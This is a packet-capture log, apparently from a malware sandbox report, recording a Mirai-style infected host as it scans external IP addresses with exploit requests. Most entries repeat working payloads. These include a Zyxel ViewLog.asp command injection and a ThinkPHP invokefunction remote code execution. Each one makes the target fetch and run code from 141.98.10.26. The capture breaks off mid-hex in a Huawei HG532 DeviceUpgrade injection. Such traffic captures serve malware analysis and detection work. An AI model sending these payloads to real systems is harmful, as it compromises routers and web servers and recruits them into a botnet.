Nov 22, 2023 08:39:44.851949930 CET	13944	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
693	192.168.2.23	51354	94.123.185.91	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:44.855016947 CET	13944	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
694	192.168.2.23	58542	31.200.118.110	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:44.859111071 CET	13945	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
695	192.168.2.23	54630	112.74.160.238	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:45.586333990 CET	14004	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:45.916707993 CET	14008	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:45 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
696	192.168.2.23	57014	112.29.195.43	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:45.597439051 CET	14005	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:45.958451986 CET	14010	IN	HTTP/1.1 400 Bad Request Server: Byte-nginx Date: Wed, 22 Nov 2023 07:39:45 GMT Content-Type: text/html Content-Length: 230 Connection: close via: cache03.ahhncm13 x-request-ip: 89.149.18.60 x-tt-trace-tag: id=5 x-response-cinfo: 89.149.18.60 x-response-cache: miss Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 42 79 74 65 2d 6e 67 69 6e 78 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr/>Powered by Byte-nginx<hr><center>tengine</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
697	192.168.2.23	41702	95.57.70.253	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:45.857496023 CET	14007	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:46.129201889 CET	14082	IN	HTTP/1.1 200 OK
Nov 22, 2023 08:39:46.129281044 CET	14083	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
698	192.168.2.23	38840	95.217.121.167	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:46.060439110 CET	14021	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:46.263753891 CET	14095	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:46 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
699	192.168.2.23	40652	95.163.120.132	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:46.072343111 CET	14021	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:46.287096024 CET	14118	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:39:46 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
700	192.168.2.23	55474	95.214.179.201	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:46.216212988 CET	14084	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:47.747383118 CET	14315	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:49.539158106 CET	14486	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:53.346684933 CET	14945	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:00.513571024 CET	15812	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:14.847676039 CET	17588	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:43.771728039 CET	19767	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
701	192.168.2.23	47964	62.213.178.36	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.289681911 CET	14282	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:48.227298021 CET	14330	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:49.315233946 CET	14441	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:51.554831028 CET	14771	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:55.906251907 CET	15274	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:04.608998060 CET	16353	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:23.294393063 CET	18562	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:58.105679989 CET	19777	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
702	192.168.2.23	41516	94.253.103.243	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.339895964 CET	14284	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:48.547303915 CET	14365	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:49.955115080 CET	14557	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:52.834742069 CET	14843	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:58.465876102 CET	15586	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:09.728281975 CET	16961	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:33.533045053 CET	19723	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:18.582804918 CET	19787	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
703	192.168.2.23	49476	197.224.204.222	37215

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.427391052 CET	14295	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 